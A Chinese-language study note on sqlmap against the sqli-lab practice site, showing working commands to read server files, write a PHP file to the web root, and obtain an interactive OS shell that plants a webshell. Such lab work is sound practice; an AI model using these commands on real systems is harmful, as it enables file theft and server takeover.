sqlmap学习笔记 【1】

A-1:实验环境

windows 7

ubuntu 14.04

wamp

sqli-lab

A-2:实验案例

××注意：在做本实验前确认你数据库的权限是root权限×

实验一：利用sqlmap读取目标文件

参数：   --file-read=RFILE   Read a file from the back-end DBMS file system

用法：sqlmap -u "http://192.168.1.103/sqli/Less-1/?id=1" --file-read "目标文件的绝对路径"

查找目标文件绝对路径：

1.假如网站目录下有phpinfo文件，可以通过其判断目标文件的绝对路径

2.通过让其报错，爆出网站目录的绝对路径

3.收集一份常用的网站目录路径的字典，然后进行爆破

root@F1n4lly:/home/f1n4lly/sqlmap# ./sqlmap.py -u "http://192.168.1.103/sqli/Less-1/?id=1" --file-read "C:\wamp\www\testmysql.php"

将sqlmap读取的文件内容和源文件内容相互对比，可以确定是同一文件，读取文件成功！

实验二：利用sqlmap将本地文件写入目标系统

参数：

--file-write=WFILE  Write a local file on the back-end DBMS file system

--file-dest=DFILE   Back-end DBMS absolute filepath to write to

用法：sqlmsp -u "http://192.168.1.103/sqli/Less-1/?id=1" --file-write "本地文件的绝对路径" --file-dest "目标文件的绝对路径"  

root@F1n4lly:/home/f1n4lly/sqlmap# ./sqlmap.py -u "http://192.168.1.103/sqli/Less-1/?id=1" --file-write "/1.php" --file-dest "C:\wamp\www\info.php"

在这里我们在 /下的1.php文件写入如下内容

<?phpphpinfo();?>

然后我们执行sqlmap命令进行写入

实验三：利用sqlmap交互式写入shell

参数：--os-shell          Prompt for an interactive operating system shell
用法：sqlmap -u "http://192.168.1.103/sqli/Less-1/?id=1" --os-shell

root@F1n4lly:/home/f1n4lly/sqlmap# ./sqlmap.py -u "http://192.168.1.103/sqli/Less-1/?id=1" --os-shell

选择网站程序支持的脚本语言

选择shell要入的目录

写入shell

在写入的过程中其实一共写入两个文件一个用来上传文件的php小马和一个webshell

相关参考：